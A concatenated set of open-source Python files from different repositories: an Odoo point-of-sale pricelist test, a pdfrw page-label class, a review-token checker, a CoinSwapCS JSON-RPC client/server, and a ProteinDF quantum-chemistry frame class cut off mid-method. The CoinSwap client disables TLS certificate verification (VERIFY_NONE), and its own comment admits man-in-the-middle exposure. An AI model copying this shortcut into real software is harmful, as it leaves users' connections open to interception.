'compute_price': 'fixed',
'fixed_price': 2,
'date_start': today.strftime(DEFAULT_SERVER_DATE_FORMAT),
'date_end': one_week_from_now.strftime(DEFAULT_SERVER_DATE_FORMAT),
}), (0, 0, {
'compute_price': 'fixed',
'fixed_price': 3,
'date_start': one_week_from_now.strftime(DEFAULT_SERVER_DATE_FORMAT),
'date_end': two_weeks_from_now.strftime(DEFAULT_SERVER_DATE_FORMAT),
})],
})
cost_base_pricelist = env['product.pricelist'].create({
'name': 'Cost base',
'item_ids': [(0, 0, {
'base': 'standard_price',
'compute_price': 'percentage',
'percent_price': 55,
})],
})
pricelist_base_pricelist = env['product.pricelist'].create({
'name': 'Pricelist base',
'item_ids': [(0, 0, {
'base': 'pricelist',
'base_pricelist_id': cost_base_pricelist.id,
'compute_price': 'percentage',
'percent_price': 15,
})],
})
env['product.pricelist'].create({
'name': 'Pricelist base 2',
'item_ids': [(0, 0, {
'base': 'pricelist',
'base_pricelist_id': pricelist_base_pricelist.id,
'compute_price': 'percentage',
'percent_price': 3,
})],
})
env['product.pricelist'].create({
'name': 'Pricelist base rounding',
'item_ids': [(0, 0, {
'base': 'pricelist',
'base_pricelist_id': fixed_pricelist.id,
'compute_price': 'percentage',
'percent_price': 0.01,
})],
})
excluded_pricelist = env['product.pricelist'].create({
'name': 'Not loaded'
})
env.ref('base.res_partner_18').property_product_pricelist = excluded_pricelist
# set the company currency to USD, otherwise it will assume
# euro's. this will cause issues as the sales journal is in
# USD, because of this all products would have a different
# price
main_company.currency_id = env.ref('base.USD')
test_sale_journal = journal_obj.create({'name': 'Sales Journal - Test',
'code': 'TSJ',
'type': 'sale',
'company_id': main_company.id})
all_pricelists = env['product.pricelist'].search([('id', '!=', excluded_pricelist.id)])
all_pricelists.write(dict(currency_id=main_company.currency_id.id))
src_tax = env['account.tax'].create({'name': "SRC", 'amount': 10})
dst_tax = env['account.tax'].create({'name': "DST", 'amount': 5})
env.ref('point_of_sale.letter_tray').taxes_id = [(6, 0, [src_tax.id])]
main_pos_config.write({
'tax_regime_selection': True,
'fiscal_position_ids': [(0, 0, {
'name': "FP-POS-2M",
'tax_ids': [
(0,0,{'tax_src_id': src_tax.id,
'tax_dest_id': src_tax.id}),
(0,0,{'tax_src_id': src_tax.id,
'tax_dest_id': dst_tax.id})]
})],
'journal_id': test_sale_journal.id,
'invoice_journal_id': test_sale_journal.id,
'journal_ids': [(0, 0, {'name': 'Cash Journal - Test',
'code': 'TSC',
'type': 'cash',
'company_id': main_company.id,
'journal_user': True})],
'use_pricelist': True,
'pricelist_id': public_pricelist.id,
'available_pricelist_ids': [(4, pricelist.id) for pricelist in all_pricelists],
})
# Change the default sale pricelist of customers,
# so the js tests can expect deterministically this pricelist when selecting a customer.
field = env['ir.model.fields']._get('res.partner', 'property_product_pricelist')
env['ir.property'].search([
('name', '=', 'property_product_pricelist'),
('fields_id', '=', field.id),
('res_id', '=', False)
]).write({'value_reference': 'product.pricelist,%s' % public_pricelist.id})
# open a session, the /pos/web controller will redirect to it
main_pos_config.open_session_cb()
# needed because tests are run before the module is marked as
# installed. In js web will only load qweb coming from modules
# that are returned by the backend in module_boot. Without
# this you end up with js, css but no qweb.
env['ir.module.module'].search([('name', '=', 'point_of_sale')], limit=1).state = 'installed'
self.start_tour("/pos/web", 'pos_pricelist', login="admin")
self.start_tour("/pos/web", 'pos_basic_order', login="admin")
for order in env['pos.order'].search([]):
self.assertEqual(order.state, 'paid', "Validated order has payment of " + str(order.amount_paid) + " and total of " + str(order.amount_total))
|
t3dev/odoo
|
addons/point_of_sale/tests/test_frontend.py
|
Python
|
gpl-3.0
| 13,746
|
#!/usr/bin/env python3
from collections import namedtuple
from pdfrw import PdfName, PdfDict, PdfObject, PdfString
PageLabelTuple = namedtuple("PageLabelScheme",
"startpage style prefix firstpagenum")
defaults = {"style": "arabic", "prefix": '', "firstpagenum": 1}
styles = {"arabic": PdfName('D'),
"roman lowercase": PdfName('r'),
"roman uppercase": PdfName('R'),
"letters lowercase": PdfName('a'),
"letters uppercase": PdfName('A')}
stylecodes = {v: a for a, v in styles.items()}
class PageLabelScheme(PageLabelTuple):
"""Represents a page numbering scheme.
startpage : the index in the pdf (starting from 0) of the
first page the scheme will be applied to.
style : page numbering style (arabic, roman [lowercase|uppercase], letters [lowercase|uppercase])
prefix: a prefix to be prepended to all page labels
firstpagenum : where to start numbering
"""
__slots__ = tuple()
def __new__(cls, startpage,
style=defaults["style"],
prefix=defaults["prefix"],
firstpagenum=defaults["firstpagenum"]):
if style not in styles:
raise ValueError("PageLabel style must be one of %s" % cls.styles())
return super().__new__(cls, int(startpage), style, str(prefix), int(firstpagenum))
@classmethod
def from_pdf(cls, pagenum, opts):
"""Returns a new PageLabel using options from a pdfrw object"""
return cls(pagenum,
style=stylecodes.get(opts.S, defaults["style"]),
prefix=(opts.P and opts.P.decode() or defaults["prefix"]),
firstpagenum=(opts.St or defaults["firstpagenum"]))
@staticmethod
def styles():
"""List of the allowed styles"""
return styles.keys()
def pdfobjs(self):
"""Returns a tuple of two elements to insert in the PageLabels.Nums
entry of a pdf"""
page_num = PdfObject(self.startpage)
opts = PdfDict(S=styles[self.style])
if self.prefix != defaults["prefix"]:
opts.P = PdfString.encode(self.prefix)
if self.firstpagenum != defaults["firstpagenum"]:
opts.St = PdfObject(self.firstpagenum)
return page_num, opts
|
lovasoa/pagelabels-py
|
pagelabels/pagelabelscheme.py
|
Python
|
gpl-3.0
| 2,320
|
#!/usr/bin/env python
""" This does mostly the same as the review token commit hook,
but is designed to run locally.
It will echo to standard out a fixed up version of the
review token given to it; this can be used to quickly
apply any format changes to a token (such as new fields).
It will then echo to standard error a list of problems
found (some of which will have been corrected in the
echoed output).
The basic idea is thus:
$ tn_local_check.py <token>.tn > foo
Check if you're happy with it all and then:
$ mv foo <token>.tn
"""
import sys
import os
from tn_lib import parse_tn, write_tn
# Deal with a bad command line
if len(sys.argv) != 2:
print >> sys.stderr, "You will need to specify a file to parse."
sys.exit(1)
# Parse TN
tmp = parse_tn(os.path.basename(sys.argv[1]), open(sys.argv[1]).read())
# Print out corrected TN
print write_tn(tmp).rstrip()
# Report on any errors
if len(tmp["errors"]):
print >> sys.stderr, "-" * 80
print >> sys.stderr, "The review token %s contains "\
"the following errors:" % tmp["ticket"]
for e in tmp["errors"]:
print >> sys.stderr, " - %s" % e
|
ptroja/spark2014
|
docs/lrm/review/release 0_3/tn_local_check.py
|
Python
|
gpl-3.0
| 1,182
|
"""
This package contains different `unittests <https://docs.python.org/3/library/unittest.html>`_ for the project.
Those tests help to validate difficult pieces of the software.
"""
__author__ = 'Wuersch Marcel'
__license__ = "GPLv3"
|
wursm1/eurobot-hauptsteuerung
|
eurobot/tests/__init__.py
|
Python
|
gpl-3.0
| 235
|
import os
import binascii
import json
from txjsonrpc.web.jsonrpc import Proxy
from txjsonrpc.web import jsonrpc
from twisted.web import server
from twisted.internet import reactor
try:
from OpenSSL import SSL
from twisted.internet import ssl
except:
pass
from .base import (get_current_blockheight, CoinSwapPublicParameters,
prepare_ecdsa_msg, FeePolicy)
from .alice import CoinSwapAlice
from .carol import CoinSwapCarol
from .configure import get_log, cs_single, get_network
from twisted.internet import defer
cslog = get_log()
def verifyCallback(connection, x509, errnum, errdepth, ok):
if not ok:
cslog.debug('invalid server cert: %s' % x509.get_subject())
return False
return True
class AltCtxFactory(ssl.ClientContextFactory):
def getContext(self):
ctx = ssl.ClientContextFactory.getContext(self)
#TODO: replace VERIFY_NONE with VERIFY_PEER when we have
#a real server with a valid CA signed cert. If that doesn't
#work it'll be possible to use self-signed certs, if they're distributed,
#by placing the cert.pem file and location in the config and uncommenting
#the ctx.load_verify_locations line.
#As it stands this is using non-authenticated certs, meaning MITM exposed.
ctx.set_verify(SSL.VERIFY_NONE, verifyCallback)
#ctx.load_verify_locations("/path/to/cert.pem")
return ctx
class CoinSwapJSONRPCClient(object):
"""A class encapsulating Alice's json rpc client.
"""
#Keys map to states as per description of CoinswapAlice
method_names = {0: "handshake",
1: "negotiate",
3: "tx0id_hx_tx2sig",
5: "sigtx3",
9: "secret",
12: "sigtx4"}
def __init__(self, host, port, json_callback=None, backout_callback=None,
usessl=False):
self.host = host
self.port = int(port)
#Callback fired on receiving response to send()
self.json_callback = json_callback
#Callback fired on receiving any response failure
self.backout_callback = backout_callback
if usessl:
self.proxy = Proxy('https://' + host + ":" + str(port) + "/",
ssl_ctx_factory=AltCtxFactory)
else:
self.proxy = Proxy('http://' + host + ":" + str(port) + "/")
def error(self, errmsg):
"""error callback implies we must back out at this point.
Note that this includes stateless queries, as any malformed
or non-response must be interpreted as malicious.
"""
self.backout_callback(str(errmsg))
def send_poll(self, method, callback, noncesig, sessionid, *args):
"""Stateless queries during the run use this call, and provide
their own callback for the response.
"""
d = self.proxy.callRemote("coinswap", sessionid, noncesig, method, *args)
d.addCallback(callback).addErrback(self.error)
def send_poll_unsigned(self, method, callback, *args):
"""Stateless queries outside of a coinswap run use
this query method; no nonce, sessionid or signature needed.
"""
d = self.proxy.callRemote(method, *args)
d.addCallback(callback).addErrback(self.error)
def send(self, method, *args):
"""Stateful queries share the same callback: the state machine
update function.
"""
d = self.proxy.callRemote(method, *args)
d.addCallback(self.json_callback).addErrback(self.error)
class CoinSwapCarolJSONServer(jsonrpc.JSONRPC):
def __init__(self, wallet, testing_mode=False, carol_class=CoinSwapCarol,
fail_carol_state=None):
self.testing_mode = testing_mode
self.wallet = wallet
self.carol_class = carol_class
self.fail_carol_state = fail_carol_state
self.carols = {}
self.fee_policy = FeePolicy(cs_single().config)
self.update_status()
jsonrpc.JSONRPC.__init__(self)
def render(self, request):
"""In order to respond appropriately to ill formed requests (no content,
or ill-formed content), we return a null response early in this class,
overriding render() from the base class, which unfortunately does not
correctly handle e.g. browser GET requests.
"""
request.content.seek(0, 0)
content = request.content.read()
try:
json.loads(content)
except:
return "Nothing here."
return jsonrpc.JSONRPC.render(self, request)
def refresh_carols(self):
"""Remove CoinSwapCarol instances that are flagged complete from
the running dict."""
to_remove = []
for k, v in self.carols.iteritems():
if v.completed:
to_remove.append(k)
for x in to_remove:
self.carols.pop(x, None)
cslog.info("Removed session: " + str(x) + " from tracking (finished).")
def update_status(self):
#initialise status variables from config; some are updated dynamically
c = cs_single().config
source_chain = c.get("SERVER", "source_chain")
destination_chain = c.get("SERVER", "destination_chain")
minimum_amount = c.getint("SERVER", "minimum_amount")
maximum_amount = c.getint("SERVER", "maximum_amount")
serverlockrange = c.get("SERVER", "server_locktime_range")
serverlockmin, serverlockmax = [int(x) for x in serverlockrange.split(",")]
clientlockrange = c.get("SERVER", "client_locktime_range")
clientlockmin, clientlockmax = [int(x) for x in clientlockrange.split(",")]
tx01_confirm_range = c.get("SERVER", "tx01_confirm_range")
tx01_confirm_min, tx01_confirm_max = [int(
x) for x in tx01_confirm_range.split(",")]
lock0 = c.getint("TIMEOUT", "lock_client")
status = {}
self.refresh_carols()
if len(self.carols.keys()) >= c.getint("SERVER",
"maximum_concurrent_coinswaps"):
status["busy"] = True
else:
status["busy"] = False
#real-time balance query; we source only from mixdepth 0
available_funds = self.wallet.get_balance_by_mixdepth(verbose=False)[0]
#The conservativeness here (switch off if total avail < max
#is required for privacy (otherwise we leak our wallet balance in
#this costless query). Note that the wallet can be funded while
#the server is running.
if available_funds < maximum_amount:
status["busy"] = True
status["maximum_amount"] = -1
else:
status["maximum_amount"] = maximum_amount
status["minimum_amount"] = minimum_amount
status["source_chain"] = source_chain
status["destination_chain"] = destination_chain
status["cscs_version"] = cs_single().CSCS_VERSION
status["fee_policy"] = self.fee_policy.get_policy()
status["locktimes"] = {"lock_server": {"min": serverlockmin,
"max": serverlockmax},
"lock_client": {"min": clientlockmin,
"max": clientlockmax}}
status["tx01_confirm_wait"] = {"min": tx01_confirm_min,
"max": tx01_confirm_max}
status["testnet"] = True if get_network() else False
return status
def jsonrpc_status(self):
"""This can be polled at any time.
The call to get_balance_by_mixdepth does not involve sync,
so is not resource intensive.
"""
return self.update_status()
def set_carol(self, carol, sessionid):
"""Once a CoinSwapCarol object has been initiated, its session id
has been set, so it can be added to the dict.
"""
#should be computationally infeasible; note *we* set this.
assert sessionid not in self.carols
self.carols[sessionid] = carol
return True
def consume_nonce(self, nonce, sessionid):
if sessionid not in self.carols:
return False
return self.carols[sessionid].consume_nonce(nonce)
def validate_sig_nonce(self, carol, paramlist):
noncesig = paramlist[0]
if not "nonce" in noncesig or not "sig" in noncesig:
return (False, "Ill formed nonce/sig")
nonce = noncesig["nonce"]
sig = noncesig["sig"]
if not carol.consume_nonce(nonce):
return (False, "Nonce invalid, probably a repeat")
#paramlist[1] is method name, the remaining are the args
msg_to_verify = prepare_ecdsa_msg(nonce, paramlist[1], *paramlist[2:])
if not carol.validate_alice_sig(sig, msg_to_verify):
return (False, "ECDSA message signature verification failed")
return (True, "Nonce and signature OK")
def jsonrpc_coinswap(self, *paramlist):
"""To get round txjsonrpc's rather funky function naming trick,
we use 1 generic json rpc method and then read the real method as a field.
This allows us to handle generic features like signatures and nonces in
this function before deferring actual methods to sub-calls.
All calls use syntax:
sessionid, {noncesig dict}, method, *methodargs
"""
if len(paramlist) < 3:
return (False, "Wrong length of paramlist: " + str(len(paramlist)))
sessionid = paramlist[0]
if sessionid not in self.carols:
return (False, "Unrecognized sessionid: " + str(sessionid))
carol = self.carols[sessionid]
valid, errmsg = self.validate_sig_nonce(carol, paramlist[1:])
if not valid:
return (False, "Invalid message from Alice: " + errmsg)
return carol.get_rpc_response(paramlist[2], paramlist[3:])
def jsonrpc_handshake(self, *alice_handshake):
"""The handshake messages initiates the session, so is handled
differently from other calls (future anti-DOS features may be
added here). It does not use the sig/nonce since the session key
is not yet established.
"""
#Don't accept handshake if we are busy
status = self.update_status()
if status["busy"]:
return (False, "Server is busy, cannot complete handshake")
#Prepare a new CoinSwapCarol instance for this session
#start with a unique ID of 16 byte entropy:
sessionid = binascii.hexlify(os.urandom(16))
#Logic for mixdepths:
#TX4 output is the normal coinswap output, not combined with original.
#TX5 output address functions like change, goes back to original.
#TX2/3 are unambiguous coinswap outs, since adversary can deduce
#who they belong to, no point in isolating them (go back to start).
tx4address = self.wallet.get_new_addr(1, 1, True)
tx2_carol_address = self.wallet.get_new_addr(0, 1, True)
tx3_carol_address = self.wallet.get_new_addr(0, 1, True)
tx5_carol_address = self.wallet.get_new_addr(0, 1, True)
cpp = CoinSwapPublicParameters()
cpp.set_session_id(sessionid)
cpp.set_fee_policy(self.fee_policy)
cpp.set_addr_data(addr4=tx4address, addr_2_carol= tx2_carol_address,
addr_3_carol=tx3_carol_address,
addr_5_carol=tx5_carol_address)
try:
if self.fail_carol_state:
if not self.set_carol(self.carol_class(self.wallet, 'carolstate',
cpp, testing_mode=self.testing_mode,
fail_state=self.fail_carol_state), sessionid):
return False
else:
if not self.set_carol(self.carol_class(self.wallet, 'carolstate', cpp,
testing_mode=self.testing_mode),
sessionid):
return False
except Exception as e:
return (False, "Error in setting up handshake: " + repr(e))
if not self.consume_nonce(alice_handshake[1]["nonce"], sessionid):
return (False, "Invalid nonce in handshake.")
return self.carols[sessionid].sm.tick(alice_handshake)
|
AdamISZ/CoinSwapCS
|
coinswap/csjson.py
|
Python
|
gpl-3.0
| 12,462
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2002-2014 The ProteinDF project
# see also AUTHORS and README.
#
# This file is part of ProteinDF.
#
# ProteinDF is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ProteinDF is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ProteinDF. If not, see <http://www.gnu.org/licenses/>.
import shutil
from collections import OrderedDict
import math
import os
import copy
import proteindf_tools as pdf
import proteindf_bridge as bridge
from .qcfragment import QcFragment
import logging
logger = logging.getLogger(__name__)
class QcFrame(object):
_pdfparam_filename = "pdfparam.mpac"
_db_filename = "pdfresults.h5"
TOO_SMALL = 1.0e-5
# ------------------------------------------------------------------
def __init__(self, name, *args, **kwargs):
"""
create QcFrame object.
name: name of the frame molecule
"""
# mandatory parameter
self._name = name
self._fragments = OrderedDict()
self._charge = 0
self._state = {} # 状態保持
self._cmds = self._get_default_cmds() # 外部コマンド
self._initialize()
self._prepare_work_dir()
self._load()
# cache data
self._cache = {}
if (len(args) > 0) and isinstance(args[0], QcFrame):
self._copy_constructor(args[0])
# copy constructor
def _copy_constructor(self, rhs):
self._name = rhs._name
self._fragments = copy.deepcopy(rhs._fragments)
self._charge = rhs._charge
self._state = copy.deepcopy(rhs._state)
self._cmds = copy.copy(rhs._cmds)
# def __del__(self):
# self._save()
def _initialize(self, *args, **kwargs):
pass
def _get_default_cmds(self):
cmds = {}
cmds["lo"] = "lo"
cmds["mat-extend"] = "mat-extend"
cmds["mat-mul"] = "mat-mul"
cmds["mat-select"] = "mat-select"
cmds["mat-symmetrize"] = "mat-symmetrize"
cmds["mat-transpose"] = "mat-transpose"
cmds["mat-diagonal"] = "mat-diagonal"
cmds["archive"] = "archive-h5"
return cmds
# save & load ------------------------------------------------------
def _load(self):
path = os.path.join(self.work_dir, "qcframe.mpac")
if os.path.exists(path):
logger.info("load the fragment state: {}".format(path))
state_dat = bridge.load_msgpack(path)
self.set_by_raw_data(state_dat)
else:
logger.debug("not found the state file")
def save(self):
path = os.path.join(self.work_dir, "qcframe.mpac")
# logger.info('save the fragment state: {}'.format(path))
state_dat = self.get_raw_data()
bridge.save_msgpack(state_dat, path)
def get_raw_data(self):
return self.__getstate__()
def set_by_raw_data(self, raw_data):
self.__setstate__(raw_data)
def __getstate__(self):
state = {}
state["name"] = self.name
tmp_frgs = []
for k, frg in self.fragments():
tmp_frgs.append((k, frg.get_raw_data()))
state["fragments"] = tmp_frgs
state["charge"] = self.charge
state["state"] = self._state
state["cmds"] = self._cmds
return state
def __setstate__(self, state):
assert isinstance(state, dict)
self._name = state.get("name")
self._fragments = OrderedDict()
if "fragments" in state:
for (k, frg) in state.get("fragments"):
self._fragments[k] = QcFragment(frg, parent=self)
self.charge = state.get("charge", 0)
self._state = state.get("state", {})
self._cmds.update(state.get("cmds", self._get_default_cmds()))
# pdfparam ---------------------------------------------------------
def _get_pdfparam(self):
"""
pdfparamオブジェクトを返す
"""
pdfparam_path = os.path.abspath(
os.path.join(self.work_dir, self._pdfparam_filename)
)
if "pdfparam" not in self._cache:
if os.path.exists(pdfparam_path):
mpac_data = bridge.load_msgpack(pdfparam_path)
logger.debug("pdfparam({}) is loaded.".format(pdfparam_path))
self._cache["pdfparam"] = pdf.PdfParam(mpac_data)
else:
pdfsim = pdf.PdfSim()
self._cache["pdfparam"] = pdf.get_default_pdfparam()
logger.debug("use default pdfparam.")
else:
logger.debug("pdfparam is cached.")
return self._cache["pdfparam"]
pdfparam = property(_get_pdfparam)
# DB ---------------------------------------------------------------
def set_db_filename(self, filename):
assert filename is not None
self._db_filename = str(filename)
logger.debug("set_db_filename: {}".format(self._db_filename))
def _get_db_path(self):
db_path = os.path.abspath(os.path.join(self.work_dir, self._db_filename))
logger.debug("db_filename: {}".format(self._db_filename))
return db_path
db_path = property(_get_db_path)
def get_pdfarchive(self):
"""
pdfArchiveオブジェクトを返す
"""
logger.debug("get_pdfarchive db_path={}".format(self.db_path))
pdfarc = None
if self._cmds.get("archive", None) == "archive":
pdfarc = pdf.PdfArchive(self.db_path)
else:
pdfarc = pdf.PdfParam_H5(self.db_path)
return pdfarc
# ==================================================================
# PROPERTIES
# ==================================================================
# command alias ----------------------------------------------------
def set_command_alias(self, cmd_alias_dict):
for k, v in cmd_alias_dict.items():
logger.debug("command update: {} -> {}".format(k, v))
self._cmds[k] = v
# work_dir ---------------------------------------------------------
def _get_work_dir(self):
return self._work_dir
work_dir = property(_get_work_dir)
# name -------------------------------------------------------------
def _get_name(self):
return self._name
name = property(_get_name)
# basisset ---------------------------------------------------------
def _set_basisset(self, pdfparam):
for fragment_name, fragment in self.fragments():
fragment.set_basisset(pdfparam)
# frame_molecule ---------------------------------------------------
def _get_frame_molecule(self):
"""
モデリングされた分子構造をAtomGroupオブジェクトで返す
"""
if "frame_molecule" not in self._cache:
logger.info("create frame molecule coordinates.")
frame_molecule = bridge.AtomGroup()
for frg_name, frg in self._fragments.items():
logger.info(
"fragment name={name}: atoms={atoms}, elec={elec}, charge={charge}".format(
name=frg_name,
atoms=frg.get_number_of_all_atoms(),
elec=frg.sum_of_atomic_number(),
charge=frg.get_AtomGroup().charge,
)
)
frame_molecule[frg_name] = frg.get_AtomGroup()
self._cache["frame_molecule"] = frame_molecule
logger.info("")
return self._cache["frame_molecule"]
frame_molecule = property(_get_frame_molecule)
# fragment_atom_ids ------------------------------------------------
def _get_fragments_atom_ids(self):
fragments_atom_ids = []
for fragment_name, fragment in self.fragments():
fragment_atomgroup = fragment.get_AtomGroup()
fragment_atomgroup *= pdf.ANG2AU # angstrom -> a.u.
fragment_atom_list = fragment_atomgroup.get_atom_list()
atom_id_list = []
for atom in fragment_atom_list:
atom_id = int(self.pdfparam.find_atom_index(atom))
if atom_id == -1:
logger.critical("not found atom index: {}".format(str(atom)))
atom_id_list.append(atom_id)
fragments_atom_ids.append(atom_id_list)
return fragments_atom_ids
fragments_atom_ids = property(_get_fragments_atom_ids)
# work dir ---------------------------------------------------------
def _prepare_work_dir(self):
"""
カレントディレクトリ下に作業ディレクトリとなる
nameのディレクトリを作成する。
"""
# assert(len(self.name) > 0)
if len(self.name) == 0:
logger.critical("frame name is not defined.")
raise
self._work_dir = os.path.abspath(os.path.join(os.curdir, self.name))
if not os.path.exists(self.work_dir):
logger.info(
"{header} make work dir: {path}".format(
header=self.header, path=self.work_dir
)
)
os.mkdir(self.work_dir)
else:
logger.debug(
"{header} already exist: {path}".format(
header=self.header, path=self.work_dir
)
)
def cd_work_dir(self, job_name=""):
"""
作業ディレクトリをオブジェクトのwork_dirに移動する
"""
logger.info("=" * 20)
logger.info(
"{header} > {job_name}@{frame_name}".format(
header=self.header, job_name=job_name, frame_name=self.name
)
)
logger.debug(
"{header} work dir: {work_dir}".format(
header=self.header, work_dir=self.work_dir
)
)
logger.info("=" * 20)
self._prev_dir = os.path.abspath(os.curdir)
os.chdir(self.work_dir)
def restore_cwd(self):
"""
self.cd_work_dir() 以前のディレクトリに戻す
"""
os.chdir(self._prev_dir)
logger.debug(
"{header} < (prev_dir: {path})".format(
header=self.header, path=self._prev_dir
)
)
def _check_path(self, path):
if not os.path.exists(path):
logger.warn(
"{header} NOT FOUND: {path}".format(header=self.header, path=path)
)
# charge -----------------------------------------------------------
def _get_charge(self):
return int(self._charge)
def _set_charge(self, charge):
self._charge = int(charge)
charge = property(_get_charge, _set_charge)
# num_of_AOs -------------------------------------------------------
def get_number_of_AOs(self):
"""
return the number of atomic orbitals.
"""
num_of_AOs = 0
for frg_name, frg in self.fragments():
num_of_AOs += frg.get_number_of_AOs()
return num_of_AOs
# ==================================================================
# STATE
# ==================================================================
# guess_density ----------------------------------------------------
def _get_state_finished_guess_density(self):
self._state.setdefault("is_finished_guess_density", False)
return self._state["is_finished_guess_density"]
def _set_state_finished_guess_density(self, yn):
self._state["is_finished_guess_density"] = bool(yn)
is_finished_guess_density = property(
_get_state_finished_guess_density, _set_state_finished_guess_density
)
# guess_QCLO -------------------------------------------------------
def _get_state_finished_guess_QCLO(self):
self._state.setdefault("is_finished_guess_QCLO", False)
return self._state["is_finished_guess_QCLO"]
def _set_state_finished_guess_QCLO(self, yn):
self._state["is_finished_guess_QCLO"] = bool(yn)
is_finished_guess_QCLO = property(
_get_state_finished_guess_QCLO, _set_state_finished_guess_QCLO
)
# pre-SCF ----------------------------------------------------------
def _get_state_finished_prescf(self):
self._state.setdefault("is_finished_prescf", False)
return self._state["is_finished_prescf"]
def _set_state_finished_prescf(self, yn):
self._state["is_finished_prescf"] = bool(yn)
is_finished_prescf = property(
_get_state_finished_prescf, _set_state_finished_prescf
)
# SCF --------------------------------------------------------------
def _get_state_finished_scf(self):
self._state.setdefault("is_finished_scf", False)
return self._state["is_finished_scf"]
def _set_state_finished_scf(self, yn):
self._state["is_finished_scf"] = bool(yn)
is_finished_scf = property(_get_state_finished_scf, _set_state_finished_scf)
# Force ------------------------------------------------------------
def _get_state_finished_force(self):
self._state.setdefault("is_finished_force", False)
return self._state["is_finished_force"]
def _set_state_finished_force(self, yn):
self._state["is_finished_force"] = bool(yn)
is_finished_force = property(_get_state_finished_force, _set_state_finished_force)
# pick density matrix ---------------------------------------------
def _get_state_finished_pickup_density_matrix(self):
self._state.setdefault("is_finished_pickup_density_matrix", False)
return self._state["is_finished_pickup_density_matrix"]
def _set_state_finished_pickup_density_matrix(self, yn):
self._state["is_finished_pickup_density_matrix"] = bool(yn)
is_finished_pickup_density_matrix = property(
_get_state_finished_pickup_density_matrix,
_set_state_finished_pickup_density_matrix,
)
# LO ---------------------------------------------------------------
def _get_state_finished_LO(self):
self._state.setdefault("is_finished_LO", False)
return self._state["is_finished_LO"]
def _set_state_finished_LO(self, yn):
self._state["is_finished_LO"] = bool(yn)
is_finished_LO = property(_get_state_finished_LO, _set_state_finished_LO)
# pickup LO --------------------------------------------------------
def _get_state_finished_pickup_LO(self):
self._state.setdefault("is_finished_pickup_LO", False)
return self._state["is_finished_pickup_LO"]
def _set_state_finished_pickup_LO(self, yn):
self._state["is_finished_pickup_LO"] = bool(yn)
is_finished_pickup_LO = property(
_get_state_finished_pickup_LO, _set_state_finished_pickup_LO
)
# ==================================================================
# GUESS
# ==================================================================
# guess density ----------------------------------------------------
def guess_density(self, run_type="rks", force=False):
if (self.is_finished_guess_density == True) and (force == False):
logger.info("guess_density has been calced.")
return
self.cd_work_dir("guess_density")
guess_density_matrix_path = "guess.density.{}.mat".format(run_type)
# 既存のデータを消去する
if os.path.exists(guess_density_matrix_path):
os.remove(guess_density_matrix_path)
pdfsim = pdf.PdfSim()
pdfsim.setup()
for frg_name, frg in self.fragments():
logger.info(
"fragment name={}: {} atoms".format(
frg_name, frg.get_number_of_all_atoms()
)
)
if frg.parent == None:
logger.warn(
"guess_density(): parent == None. frg_name={}".format(frg_name)
)
frg.set_command_alias(self._cmds)
frg_guess_density_matrix_path = frg.prepare_guess_density_matrix(run_type)
logger.debug(
"guess_density() [{}@{}] ext: {} from {}".format(
frg_name,
frg.parent.name,
guess_density_matrix_path,
frg_guess_density_matrix_path,
)
)
if os.path.exists(frg_guess_density_matrix_path):
pdf.run_pdf(
[
self._cmds["mat-extend"],
"-d",
guess_density_matrix_path,
frg_guess_density_matrix_path,
guess_density_matrix_path,
]
)
else:
logger.warn(
"not found: frg.guess.dens.mat={}".format(
frg_guess_density_matrix_path
)
)
self.pdfparam.guess = "density_matrix"
logger.info(
"initial guess (density matrix) created at {}".format(
guess_density_matrix_path
)
)
# check
self._check_path(guess_density_matrix_path)
self.is_finished_guess_density = True
self.save()
self.restore_cwd()
def guess_QCLO(self, run_type="rks", force=False, isCalcOrthogonalize=False):
"""create guess by using QCLO method"""
if (self.is_finished_guess_QCLO == True) and (force == False):
logger.info("guess_density has been calced.")
return
self.cd_work_dir("guess_QCLO")
guess_QCLO_matrix_path = "guess.QCLO.{}.mat".format(run_type)
if os.path.exists(guess_QCLO_matrix_path):
os.remove(guess_QCLO_matrix_path)
num_of_AOs = 0
for frg_name, frg in self.fragments():
logger.info(
"guess QCLO: frg_name={}, parent={}".format(frg_name, frg.parent.name)
)
frg.set_command_alias(self._cmds)
frg_QCLO_matrix_path = frg.prepare_guess_QCLO_matrix(
run_type, self, force=force
)
if os.path.exists(frg_QCLO_matrix_path):
pdf.run_pdf(
[
self._cmds["mat-extend"],
"-c",
guess_QCLO_matrix_path,
frg_QCLO_matrix_path,
guess_QCLO_matrix_path,
]
)
else:
logger.warn(
"The QCLO of the subgroup, {}, was not created.".format(frg_name)
)
# orthogonalize
guess_path = "guess.lcao.{}.mat".format(run_type)
if isCalcOrthogonalize:
if self.is_finished_prescf != True:
self.calc_preSCF()
logger.info("orthogonalize")
Xinv_path = self.pdfparam.get_Xinv_mat_path()
self._check_path(guess_QCLO_matrix_path)
pdf.run_pdf(
[
self._cmds["mat-mul"],
"-v",
Xinv_path,
guess_QCLO_matrix_path,
guess_path,
]
)
else:
shutil.copy(guess_QCLO_matrix_path, guess_path)
self.pdfparam.guess = "lcao"
logger.info("guess LCAO matrix created: {}".format(guess_path))
# check
self._check_path(guess_QCLO_matrix_path)
self.is_finished_guess_QCLO = True
self.save()
self.restore_cwd()
# create occ file
self._create_occupation_file(run_type)
def _create_occupation_file(self, run_type="rks"):
self.cd_work_dir("create occ")
self._setup_pdf()
occ_level = -1
electrons_per_orb = 0.0
run_type = run_type.upper()
if run_type == "RKS":
occ_level = int((self.pdfparam.num_of_electrons / 2.0))
electrons_per_orb = 2.0
else:
logger.critical(
"{header} NOT supported. run_type={run_type}".format(
header=self.header, run_type=run_type
)
)
# num_of_MOs = self.pdfparam.num_of_MOs
# occ_vtr = pdf.Vector(num_of_MOs)
occ_vtr = pdf.Vector(occ_level)
for i in range(occ_level):
occ_vtr.set(i, electrons_per_orb)
occ_vtr_path = "guess.occ.{}.vtr".format(run_type.lower())
occ_vtr.save(occ_vtr_path)
self._check_path(occ_vtr_path)
self.save()
self.restore_cwd()
# ==================================================================
# CALC
# ==================================================================
def _setup_pdf(self):
logger.info("{header} setup ProteinDF condition".format(header=self.header))
for frg_name, frg in self.fragments():
frg.set_basisset(self.pdfparam)
self.pdfparam.molecule = self.frame_molecule
# num_of_electrons
